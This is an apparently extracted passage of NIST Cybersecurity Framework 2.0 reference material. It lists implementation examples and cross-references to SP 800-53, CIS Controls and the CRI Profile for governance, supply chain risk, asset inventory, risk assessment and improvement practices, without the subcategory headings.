SP 800-221A: GV.AD-3
SP 800-221A: MA.RM-8
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-19
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-06

Implementation Examples:
Ex1: Review key performance indicators (KPIs) to ensure that organization-wide policies and procedures achieve objectives
Ex2: Review key risk indicators (KRIs) to identify risks the organization faces, including likelihood and potential impact
Ex3: Collect and communicate metrics on cybersecurity risk management with senior leadership

Informative References:
CRI Profile v2.0: GV.OV-03
CRI Profile v2.0: GV.OV-03.01
CRI Profile v2.0: GV.OV-03.02
SP 800-221A: GV.OV-2
SP 800-221A: MA.RM-2
SP 800-53 Rev 5.1.1: PM-04
SP 800-53 Rev 5.1.1: PM-06
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SR-06

Informative References:
CRI Profile v2.0: GV.SC
CSF v1.1: ID.SC
SP 800-221A: GV.OV-4

Implementation Examples:
Ex1: Establish a strategy that expresses the objectives of the cybersecurity supply chain risk management program
Ex2: Develop the cybersecurity supply chain risk management program, including a plan (with milestones), policies, and procedures that guide implementation and improvement of the program, and share the policies and procedures with the organizational stakeholders
Ex3: Develop and implement program processes based on the strategy, objectives, policies, and procedures that are agreed upon and performed by the organizational stakeholders
Ex4: Establish a cross-organizational mechanism that ensures alignment between functions that contribute to cybersecurity supply chain risk management, such as cybersecurity, IT, operations, legal, human resources, and engineering

Informative References:
CIS Controls v8.0: 15.2
CRI Profile v2.0: GV.SC-01
CRI Profile v2.0: GV.SC-01.01
CRI Profile v2.0: GV.SC-01.02
CSF v1.1: ID.SC-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03

Implementation Examples:
Ex1: Identify one or more specific roles or positions that will be responsible and accountable for planning, resourcing, and executing cybersecurity supply chain risk management activities
Ex2: Document cybersecurity supply chain risk management roles and responsibilities in policy
Ex3: Create responsibility matrixes to document who will be responsible and accountable for cybersecurity supply chain risk management activities and how those teams and individuals will be consulted and informed
Ex4: Include cybersecurity supply chain risk management responsibilities and performance requirements in personnel descriptions to ensure clarity and improve accountability
Ex5: Document performance goals for personnel with cybersecurity risk management-specific responsibilities, and periodically measure them to demonstrate and improve performance
Ex6: Develop roles and responsibilities for suppliers, customers, and business partners to address shared responsibilities for applicable cybersecurity risks, and integrate them into organizational policies and applicable third-party agreements
Ex7: Internally communicate cybersecurity supply chain risk management roles and responsibilities for third parties
Ex8: Establish rules and protocols for information sharing and reporting processes between the organization and its suppliers

Informative References:
CIS Controls v8.0: 15.4
CRI Profile v2.0: GV.SC-02
CRI Profile v2.0: GV.SC-02.01
CSF v1.1: ID.AM-6
SP 800-218: PO.2.1
SP 800-221A: GV.RR-1
SP 800-221A: GV.RR-2
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-05

Implementation Examples:
Ex1: Identify areas of alignment and overlap with cybersecurity and enterprise risk management
Ex2: Establish integrated control sets for cybersecurity risk management and cybersecurity supply chain risk management
Ex3: Integrate cybersecurity supply chain risk management into improvement processes
Ex4: Escalate material cybersecurity risks in supply chains to senior management, and address them at the enterprise risk management level

Informative References:
CRI Profile v2.0: GV.SC-03
CRI Profile v2.0: GV.SC-03.01
CSF v1.1: ID.SC-2
SP 800-218: PW.4.1
SP 800-221A: GV.CT-2
SP 800-221A: GV.CT-3
SP 800-53 Rev 5.1.1: AC-01
SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-07

Implementation Examples:
Ex1: Develop criteria for supplier criticality based on, for example, the sensitivity of data processed or possessed by suppliers, the degree of access to the organization's systems, and the importance of the products or services to the organization's mission
Ex2: Keep a record of all suppliers, and prioritize suppliers based on the criticality criteria

Informative References:
CIS Controls v8.0: 15.1
CIS Controls v8.0: 15.3
CRI Profile v2.0: GV.SC-04
CRI Profile v2.0: GV.SC-04.01
CSF v1.1: ID.SC-2
SP 800-221A: GV.CT-2
SP 800-221A: GV.CT-3
SP 800-53 Rev 5.1.1: RA-09
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-06

Implementation Examples:
Ex1: Establish security requirements for suppliers, products, and services commensurate with their criticality level and potential impact if compromised
Ex2: Include all cybersecurity and supply chain requirements that third parties must follow and how compliance with the requirements may be verified in default contractual language
Ex3: Define the rules and protocols for information sharing between the organization and its suppliers and sub-tier suppliers in agreements
Ex4: Manage risk by including security requirements in agreements based on their criticality and potential impact if compromised
Ex5: Define security requirements in service-level agreements (SLAs) for monitoring suppliers for acceptable security performance throughout the supplier relationship lifecycle
Ex6: Contractually require suppliers to disclose cybersecurity features, functions, and vulnerabilities of their products and services for the life of the product or the term of service
Ex7: Contractually require suppliers to provide and maintain a current component inventory (e.g., software or hardware bill of materials) for critical products
Ex8: Contractually require suppliers to vet their employees and guard against insider threats
Ex9: Contractually require suppliers to provide evidence of performing acceptable security practices through, for example,

Informative References:
CIS Controls v8.0: 15.4
CRI Profile v2.0: EX.CN
CRI Profile v2.0: EX.CN-01
CRI Profile v2.0: EX.CN-02
CRI Profile v2.0: EX.CN-01.01
CRI Profile v2.0: EX.CN-01.02
CRI Profile v2.0: EX.CN-01.03
CRI Profile v2.0: EX.CN-02.01
CRI Profile v2.0: EX.CN-02.02
CRI Profile v2.0: EX.CN-02.03
CRI Profile v2.0: EX.CN-02.04
CSF v1.1: ID.SC-3
SP 800-218: PO.1.3
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06
SP 800-53 Rev 5.1.1: SR-10

Implementation Examples:
Ex1: Perform thorough due diligence on prospective suppliers that is consistent with procurement planning and commensurate with the level of risk, criticality, and complexity of each supplier relationship
Ex2: Assess the suitability of the technology and cybersecurity capabilities and the risk management practices of prospective suppliers
Ex3: Conduct supplier risk assessments against business and applicable cybersecurity requirements
Ex4: Assess the authenticity, integrity, and security of critical products prior to acquisition and use

Informative References:
CIS Controls v8.0: 15.5
CRI Profile v2.0: EX.DD
CRI Profile v2.0: EX.DD-01
CRI Profile v2.0: EX.DD-02
CRI Profile v2.0: EX.DD-01.01
CRI Profile v2.0: EX.DD-01.02
CRI Profile v2.0: EX.DD-01.03
CRI Profile v2.0: EX.DD-02.01
CRI Profile v2.0: EX.DD-02.02
CRI Profile v2.0: EX.DD-02.03
CRI Profile v2.0: EX.DD-02.04
CSF v1.1: ID.SC-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06

Implementation Examples:
Ex1: Adjust assessment formats and frequencies based on the third party's reputation and the criticality of the products or services they provide
Ex2: Evaluate third parties' evidence of compliance with contractual cybersecurity requirements, such as self-attestations, warranties, certifications, and other artifacts
Ex3: Monitor critical suppliers to ensure that they are fulfilling their security obligations throughout the supplier relationship lifecycle using a variety of methods and techniques, such as inspections, audits, tests, or other forms of evaluation
Ex4: Monitor critical suppliers, services, and products for changes to their risk profiles, and reevaluate supplier criticality and risk impact accordingly
Ex5: Plan for unexpected supplier and supply chain-related interruptions to ensure business continuity

Informative References:
CIS Controls v8.0: 15.6
CRI Profile v2.0: EX.MM
CRI Profile v2.0: EX.MM-01
CRI Profile v2.0: EX.MM-02
CRI Profile v2.0: EX.MM-01.01
CRI Profile v2.0: EX.MM-01.02
CRI Profile v2.0: EX.MM-01.03
CRI Profile v2.0: EX.MM-01.04
CRI Profile v2.0: EX.MM-01.05
CRI Profile v2.0: EX.MM-01.06
CRI Profile v2.0: EX.MM-02.01
CRI Profile v2.0: EX.MM-02.02
CRI Profile v2.0: EX.MM-02.03
CSF v1.1: ID.SC-2
CSF v1.1: ID.SC-4
SP 800-218: PW.4.1
SP 800-218: PW.4.4
SP 800-221A: GV.CT-2
SP 800-221A: GV.CT-3
SP 800-221A: MA.RM-2
SP 800-221A: MA.RM-3
SP 800-53 Rev 5.1.1: RA-09
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-06

Implementation Examples:
Ex1: Define and use rules and protocols for reporting incident response and recovery activities and the status between the organization and its suppliers
Ex2: Identify and document the roles and responsibilities of the organization and its suppliers for incident response
Ex3: Include critical suppliers in incident response exercises and simulations
Ex4: Define and coordinate crisis communication methods and protocols between the organization and its critical suppliers
Ex5: Conduct collaborative lessons learned sessions with critical suppliers

Informative References:
CIS Controls v8.0: 15.4
CRI Profile v2.0: GV.SC-08
CRI Profile v2.0: GV.SC-08.01
CSF v1.1: ID.SC-5
SP 800-221A: GV.CT-3
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-08
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IR-01

Implementation Examples:
Ex1: Policies and procedures require provenance records for all acquired technology products and services
Ex2: Periodically provide risk reporting to leaders about how acquired components are proven to be untampered and authentic
Ex3: Communicate regularly among cybersecurity risk managers and operations personnel about the need to acquire software patches, updates, and upgrades only from authenticated and trustworthy software providers
Ex4: Review policies to ensure that they require approved supplier personnel to perform maintenance on supplier products
Ex5: Policies and procedures require checking upgrades to critical hardware for unauthorized changes

Informative References:
CIS Controls v8.0: 15.6
CRI Profile v2.0: GV.SC-09
CRI Profile v2.0: GV.SC-09.01
CSF v1.1: ID.SC-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-19
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06

Implementation Examples:
Ex1: Establish processes for terminating critical relationships under both normal and adverse circumstances
Ex2: Define and implement plans for component end-of-life maintenance support and obsolescence
Ex3: Verify that supplier access to organization resources is deactivated promptly when it is no longer needed
Ex4: Verify that assets containing the organization's data are returned or properly disposed of in a timely, controlled, and safe manner
Ex5: Develop and execute a plan for terminating or transitioning supplier relationships that takes supply chain security risk and resiliency into account
Ex6: Mitigate risks to data and systems created by supplier termination
Ex7: Manage data leakage risks associated with supplier termination

Informative References:
CIS Controls v8.0: 15.7
CRI Profile v2.0: EX.TR
CRI Profile v2.0: EX.TR-01
CRI Profile v2.0: EX.TR-02
CRI Profile v2.0: EX.TR-01.01
CRI Profile v2.0: EX.TR-01.02
CRI Profile v2.0: EX.TR-01.03
CRI Profile v2.0: EX.TR-02.01
CSF v1.1: ID.SC-1
SP 800-221A: GV.PO-1
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-05
SP 800-53 Rev 5.1.1: RA-07
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06

Informative References:
CRI Profile v2.0: ID
CSF v1.1: ID

Informative References:
CRI Profile v2.0: ID.AM
CSF v1.1: ID.AM
SP 800-221A: MA.RI-1

Implementation Examples:
Ex1: Maintain inventories for all types of hardware, including IT, IoT, OT, and mobile devices
Ex2: Constantly monitor networks to detect new hardware and automatically update inventories

Informative References:
CIS Controls v8.0: 1.1
CRI Profile v2.0: ID.AM-01
CRI Profile v2.0: ID.AM-01.01
CSF v1.1: ID.AM-1
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: CM-08
SP 800-53 Rev 5.1.1: PM-05

Implementation Examples:
Ex1: Maintain inventories for all types of software and services, including commercial-off-the-shelf, open-source, custom applications, API services, and cloud-based applications and services
Ex2: Constantly monitor all platforms, including containers and virtual machines, for software and service inventory changes
Ex3: Maintain an inventory of the organization's systems

Informative References:
CIS Controls v8.0: 2.1
CRI Profile v2.0: ID.AM-02
CRI Profile v2.0: ID.AM-02.01
CSF v1.1: ID.AM-2
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: AC-20
SP 800-53 Rev 5.1.1: CM-08
SP 800-53 Rev 5.1.1: PM-05
SP 800-53 Rev 5.1.1: SA-05
SP 800-53 Rev 5.1.1: SA-09

Implementation Examples:
Ex1: Maintain baselines of communication and data flows within the organization's wired and wireless networks
Ex2: Maintain baselines of communication and data flows between the organization and third parties
Ex3: Maintain baselines of communication and data flows for the organization's infrastructure-as-a-service (IaaS) usage
Ex4: Maintain documentation of expected network ports, protocols, and services that are typically used among authorized systems

Informative References:
CIS Controls v8.0: 3.8
CRI Profile v2.0: ID.AM-03
CRI Profile v2.0: ID.AM-03.01
CSF v1.1: ID.AM-3
CSF v1.1: DE.AE-1
SP 800-53 Rev 5.1.1: AC-04
SP 800-53 Rev 5.1.1: CA-03
SP 800-53 Rev 5.1.1: CA-09
SP 800-53 Rev 5.1.1: PL-02
SP 800-53 Rev 5.1.1: PL-08
SP 800-53 Rev 5.1.1: PM-07

Implementation Examples:
Ex1: Inventory all external services used by the organization, including third-party infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS), and software-as-a-service (SaaS) offerings; APIs; and other externally hosted application services
Ex2: Update the inventory when a new external service is going to be utilized to ensure adequate cybersecurity risk management monitoring of the organization's use of that service

Informative References:
CIS Controls v8.0: 15.1
CRI Profile v2.0: ID.AM-04
CRI Profile v2.0: ID.AM-04.01
CSF v1.1: ID.AM-4
SP 800-53 Rev 5.1.1: AC-20
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-02

Implementation Examples:
Ex1: Define criteria for prioritizing each class of assets
Ex2: Apply the prioritization criteria to assets
Ex3: Track the asset priorities and update them periodically or when significant changes to the organization occur

Informative References:
CIS Controls v8.0: 3.7
CRI Profile v2.0: ID.AM-05
CRI Profile v2.0: ID.AM-05.01
CRI Profile v2.0: ID.AM-05.02
CSF v1.1: ID.AM-5
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-09
SP 800-53 Rev 5.1.1: RA-02

Implementation Examples:
Ex1: Maintain a list of the designated data types of interest (e.g., personally identifiable information, protected health information, financial account numbers, organization intellectual property, operational technology data)
Ex2: Continuously discover and analyze ad hoc data to identify new instances of designated data types
Ex3: Assign data classifications to designated data types through tags or labels
Ex4: Track the provenance, data owner, and geolocation of each instance of designated data types

Informative References:
CIS Controls v8.0: 3.2
CRI Profile v2.0: ID.AM-07
CRI Profile v2.0: ID.AM-07.01
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: CM-12
SP 800-53 Rev 5.1.1: CM-13
SP 800-53 Rev 5.1.1: SI-12

Implementation Examples:
Ex1: Integrate cybersecurity considerations throughout the life cycles of systems, hardware, software, and services
Ex2: Integrate cybersecurity considerations into product life cycles
Ex3: Identify unofficial uses of technology to meet mission objectives (i.e., shadow IT)
Ex4: Periodically identify redundant systems, hardware, software, and services that unnecessarily increase the organization's attack surface
Ex5: Properly configure and secure systems, hardware, software, and services prior to their deployment in production
Ex6: Update inventories when systems, hardware, software, and services are moved or transferred within the organization
Ex7: Securely destroy stored data based on the organization's data retention policy using the prescribed destruction method, and keep and manage a record of the destructions
Ex8: Securely sanitize data storage when hardware is being retired, decommissioned, reassigned, or sent for repairs or replacement
Ex9: Offer methods for destroying paper, storage media, and other physical forms of data storage

Informative References:
CIS Controls v8.0: 1.1
CIS Controls v8.0: 3.5
CRI Profile v2.0: ID.AM-08
CRI Profile v2.0: ID.AM-08.01
CRI Profile v2.0: ID.AM-08.02
CRI Profile v2.0: ID.AM-08.03
CRI Profile v2.0: ID.AM-08.04
CRI Profile v2.0: ID.AM-08.05
CRI Profile v2.0: ID.AM-08.06
CSF v1.1: PR.DS-3
CSF v1.1: PR.IP-2
CSF v1.1: PR.MA-1
CSF v1.1: PR.MA-2
CSF v1.1: PR.IP-6
CSF v1.1: PR.DS
SP 800-218: PW.4.1
SP 800-218: PW.4.4
SP 800-221A: MA.RI-1
SP 800-53 Rev 5.1.1: CM-09
SP 800-53 Rev 5.1.1: CM-13
SP 800-53 Rev 5.1.1: MA-02
SP 800-53 Rev 5.1.1: MA-06
SP 800-53 Rev 5.1.1: PL-02
SP 800-53 Rev 5.1.1: PM-22
SP 800-53 Rev 5.1.1: PM-23
SP 800-53 Rev 5.1.1: SA-03
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-08
SP 800-53 Rev 5.1.1: SA-22
SP 800-53 Rev 5.1.1: SI-12
SP 800-53 Rev 5.1.1: SI-18
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-12

Informative References:
CRI Profile v2.0: ID.RA
CSF v1.1: ID.RA
SP 800-221A: GV.BE-4

Implementation Examples:
Ex1: Use vulnerability management technologies to identify unpatched and misconfigured software
Ex2: Assess network and system architectures for design and implementation weaknesses that affect cybersecurity
Ex3: Review, analyze, or test organization-developed software to identify design, coding, and default configuration vulnerabilities
Ex4: Assess facilities that house critical computing assets for physical vulnerabilities and resilience issues
Ex5: Monitor sources of cyber threat intelligence for information on new vulnerabilities in products and services
Ex6: Review processes and procedures for weaknesses that could be exploited to affect cybersecurity

Informative References:
CIS Controls v8.0: 7.1
CRI Profile v2.0: ID.RA-01
CRI Profile v2.0: ID.RA-01.01
CRI Profile v2.0: ID.RA-01.02
CRI Profile v2.0: ID.RA-01.03
CSF v1.1: ID.RA-1
CSF v1.1: PR.IP-12
CSF v1.1: DE.CM-8
SP 800-218: PO.5.2
SP 800-221A: MA.RI-3
SP 800-53 Rev 5.1.1: CA-02
SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: CA-08
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-05
SP 800-53 Rev 5.1.1: SA-11(02)
SP 800-53 Rev 5.1.1: SA-15(07)
SP 800-53 Rev 5.1.1: SA-15(08)
SP 800-53 Rev 5.1.1: SI-04
SP 800-53 Rev 5.1.1: SI-05

Implementation Examples:
Ex1: Configure cybersecurity tools and technologies with detection or response capabilities to securely ingest cyber threat intelligence feeds
Ex2: Receive and review advisories from reputable third parties on current threat actors and their tactics, techniques, and procedures (TTPs)
Ex3: Monitor sources of cyber threat intelligence for information on the types of vulnerabilities that emerging technologies may have

Informative References:
CRI Profile v2.0: ID.RA-02
CRI Profile v2.0: ID.RA-02.01
CRI Profile v2.0: ID.RA-02.02
CSF v1.1: ID.RA-2
SP 800-221A: GV.BE-4
SP 800-53 Rev 5.1.1: SI-05
SP 800-53 Rev 5.1.1: PM-15
SP 800-53 Rev 5.1.1: PM-16

Implementation Examples:
Ex1: Use cyber threat intelligence to maintain awareness of the types of threat actors likely to target the organization and the TTPs they are likely to use
Ex2: Perform threat hunting to look for signs of threat actors within the environment
Ex3: Implement processes for identifying internal threat actors

Informative References:
CRI Profile v2.0: ID.RA-03
CRI Profile v2.0: ID.RA-03.01
CRI Profile v2.0: ID.RA-03.02
CRI Profile v2.0: ID.RA-03.03
CRI Profile v2.0: ID.RA-03.04
CSF v1.1: ID.RA-3
SP 800-221A: MA.RI-2
SP 800-53 Rev 5.1.1: PM-12
SP 800-53 Rev 5.1.1: PM-16
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: SI-05

Implementation Examples:
Ex1: Business leaders and cybersecurity risk management practitioners work together to estimate the likelihood and impact of risk scenarios and record them in risk registers
Ex2: Enumerate the potential business impacts of unauthorized access to the organization's communications, systems, and data processed in or by those systems
Ex3: Account for the potential impacts of cascading failures for systems of systems

Informative References:
CRI Profile v2.0: ID.RA-04
CRI Profile v2.0: ID.RA-04.01
CSF v1.1: ID.RA-4
SP 800-221A: MA.RI-4
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-11
SP 800-53 Rev 5.1.1: RA-02
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-08
SP 800-53 Rev 5.1.1: RA-09

Implementation Examples:
Ex1: Develop threat models to better understand risks to the data and identify appropriate risk responses
Ex2: Prioritize cybersecurity resource allocations and investments based on estimated likelihoods and impacts

Informative References:
CRI Profile v2.0: ID.RA-05
CRI Profile v2.0: ID.RA-05.01
CRI Profile v2.0: ID.RA-05.02
CRI Profile v2.0: ID.RA-05.03
CRI Profile v2.0: ID.RA-05.04
CSF v1.1: ID.RA-5
SP 800-218: PW.1.1
SP 800-221A: MA.RA-2
SP 800-53 Rev 5.1.1: PM-16
SP 800-53 Rev 5.1.1: RA-02
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-07

Implementation Examples:
Ex1: Apply the vulnerability management plan's criteria for deciding whether to accept, transfer, mitigate, or avoid risk
Ex2: Apply the vulnerability management plan's criteria for selecting compensating controls to mitigate risk
Ex3: Track the progress of risk response implementation (e.g., plan of action and milestones [POA&M], risk register, risk detail report)
Ex4: Use risk assessment findings to inform risk response decisions and actions
Ex5: Communicate planned risk responses to affected stakeholders in priority order

Informative References:
CRI Profile v2.0: ID.RA-06
CRI Profile v2.0: ID.RA-06.01
CRI Profile v2.0: ID.RA-06.02
CRI Profile v2.0: ID.RA-06.03
CRI Profile v2.0: ID.RA-06.04
CRI Profile v2.0: ID.RA-06.05
CRI Profile v2.0: ID.RA-06.06
CSF v1.1: ID.RA-6
CSF v1.1: RS.MI-3
SP 800-218: PO.5.2
SP 800-221A: MA.RP
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-07

Implementation Examples:
Ex1: Implement and follow procedures for the formal documentation, review, testing, and approval of proposed changes and requested exceptions
Ex2: Document the possible risks of making or not making each proposed change, and provide guidance on rolling back changes
Ex3: Document the risks related to each requested exception and the plan for responding to those risks
Ex4: Periodically review risks that were accepted based upon planned future actions or milestones

Informative References:
CRI Profile v2.0: ID.RA-07
CRI Profile v2.0: ID.RA-07.01
CRI Profile v2.0: ID.RA-07.02
CRI Profile v2.0: ID.RA-07.03
CRI Profile v2.0: ID.RA-07.04
CRI Profile v2.0: ID.RA-07.05
CSF v1.1: PR.IP-3
SP 800-218: PO.5.2
SP 800-221A: MA.RI-3
SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: CM-03
SP 800-53 Rev 5.1.1: CM-04

Implementation Examples:
Ex1: Conduct vulnerability information sharing between the organization and its suppliers following the rules and protocols defined in contracts
Ex2: Assign responsibilities and verify the execution of procedures for processing, analyzing the impact of, and responding to cybersecurity threat, vulnerability, or incident disclosures by suppliers, customers, partners, and government cybersecurity organizations

Informative References:
CIS Controls v8.0: 7.2
CRI Profile v2.0: ID.RA-08
CRI Profile v2.0: ID.RA-08.01
CRI Profile v2.0: ID.RA-08.02
CSF v1.1: RS.AN-5
SP 800-221A: MA.RI-3
SP 800-53 Rev 5.1.1: RA-05



Implementation Examples:
  Ex1: Assess the authenticity and cybersecurity of critical technology products and services prior to acquisition and use

Informative References:
  CRI Profile v2.0: EX.DD-04
  CRI Profile v2.0: EX.DD-04.01
  CRI Profile v2.0: EX.DD-04.02
  CSF v1.1: PR.DS-8
  SP 800-218: PO.5.2
  SP 800-221A: MA.RI-3
  SP 800-53 Rev 5.1.1: SA-04
  SP 800-53 Rev 5.1.1: SA-05
  SP 800-53 Rev 5.1.1: SA-10
  SP 800-53 Rev 5.1.1: SA-11
  SP 800-53 Rev 5.1.1: SA-15
  SP 800-53 Rev 5.1.1: SA-17
  SP 800-53 Rev 5.1.1: SI-07
  SP 800-53 Rev 5.1.1: SR-05
  SP 800-53 Rev 5.1.1: SR-06
  SP 800-53 Rev 5.1.1: SR-10
  SP 800-53 Rev 5.1.1: SR-11

Implementation Examples:
  Ex1: Conduct supplier risk assessments against business and applicable cybersecurity requirements, including the supply chain

Informative References:
  CRI Profile v2.0: EX.DD-03
  CRI Profile v2.0: EX.DD-03.01
  CRI Profile v2.0: EX.DD-03.02
  CRI Profile v2.0: EX.DD-03.03
  CSF v1.1: ID.SC-2
  CSF v1.1: ID.SC-4
  SP 800-221A: GV.CT-2
  SP 800-221A: GV.CT-3
  SP 800-221A: MA.RM-2
  SP 800-221A: MA.RM-3
  SP 800-53 Rev 5.1.1: SR-06



Informative References:
  CRI Profile v2.0: ID.IM
  CSF v1.1: RS.IM
  CSF v1.1: RC.IM
  CSF v1.1: PR.IP-7
  CSF v1.1: DE.DP-5
  SP 800-221A: MA.IM-1



Implementation Examples:
  Ex1: Perform self-assessments of critical services that take current threats and TTPs into consideration
  Ex2: Invest in third-party assessments or independent audits of the effectiveness of the organization's cybersecurity program to identify areas that need improvement
  Ex3: Constantly evaluate compliance with selected cybersecurity requirements through automated means

Informative References:
  CRI Profile v2.0: ID.IM-01
  CRI Profile v2.0: ID.IM-01.01
  CRI Profile v2.0: ID.IM-01.02
  CRI Profile v2.0: ID.IM-01.03
  CRI Profile v2.0: ID.IM-01.04
  CRI Profile v2.0: ID.IM-01.05
  SP 800-53 Rev 5.1.1: AC-01
  SP 800-53 Rev 5.1.1: AT-01
  SP 800-53 Rev 5.1.1: AU-01
  SP 800-53 Rev 5.1.1: CA-01
  SP 800-53 Rev 5.1.1: CM-01
  SP 800-53 Rev 5.1.1: CP-01
  SP 800-53 Rev 5.1.1: IA-01
  SP 800-53 Rev 5.1.1: IR-01
  SP 800-53 Rev 5.1.1: MA-01
  SP 800-53 Rev 5.1.1: MP-01
  SP 800-53 Rev 5.1.1: PE-01
  SP 800-53 Rev 5.1.1: PL-01
  SP 800-53 Rev 5.1.1: PM-01
  SP 800-53 Rev 5.1.1: PS-01
  SP 800-53 Rev 5.1.1: PT-01
  SP 800-53 Rev 5.1.1: RA-01
  SP 800-53 Rev 5.1.1: SA-01
  SP 800-53 Rev 5.1.1: SC-01
  SP 800-53 Rev 5.1.1: SI-01
  SP 800-53 Rev 5.1.1: SR-01
  SP 800-53 Rev 5.1.1: CA-02
  SP 800-53 Rev 5.1.1: CA-05
  SP 800-53 Rev 5.1.1: CA-07
  SP 800-53 Rev 5.1.1: CA-08
  SP 800-53 Rev 5.1.1: CP-02
  SP 800-53 Rev 5.1.1: IR-04
  SP 800-53 Rev 5.1.1: IR-08
  SP 800-53 Rev 5.1.1: PL-02
  SP 800-53 Rev 5.1.1: RA-03
  SP 800-53 Rev 5.1.1: RA-05
  SP 800-53 Rev 5.1.1: RA-07



Implementation Examples:
  Ex1: Identify improvements for future incident response activities based on findings from incident response assessments (e.g., tabletop exercises and simulations, tests, internal reviews, independent audits)
  Ex2: Identify improvements for future business continuity, disaster recovery, and incident response activities based on exercises performed in coordination with critical service providers and product suppliers
  Ex3: Involve internal stakeholders (e.g., senior executives, legal department, HR) in security tests and exercises as appropriate
  Ex4: Perform penetration testing to identify opportunities to improve the security posture of selected high-risk systems as approved by leadership
  Ex5: Exercise contingency plans for responding to and recovering from the discovery that products or services did not originate with the contracted supplier or partner or were altered before receipt
  Ex6: Collect and analyze performance metrics using security tools and services to inform improvements to the cybersecurity program

Informative References:
  CIS Controls v8.0: 17.7
  CRI Profile v2.0: ID.IM-02
  CRI Profile v2.0: ID.IM-02.01
  CRI Profile v2.0: ID.IM-02.02
  CRI Profile v2.0: ID.IM-02.03
  CRI Profile v2.0: ID.IM-02.04
  CRI Profile v2.0: ID.IM-02.05
  CRI Profile v2.0: ID.IM-02.06
  CRI Profile v2.0: ID.IM-02.07
  CRI Profile v2.0: ID.IM-02.08
  CRI Profile v2.0: ID.IM-02.09
  CSF v1.1: ID.SC-5
  CSF v1.1: PR.IP-10
  CSF v1.1: DE.DP-3
  SP 800-221A: GV.CT-3
  SP 800-53 Rev 5.1.1: AC-01
  SP 800-53 Rev 5.1.1: AT-01
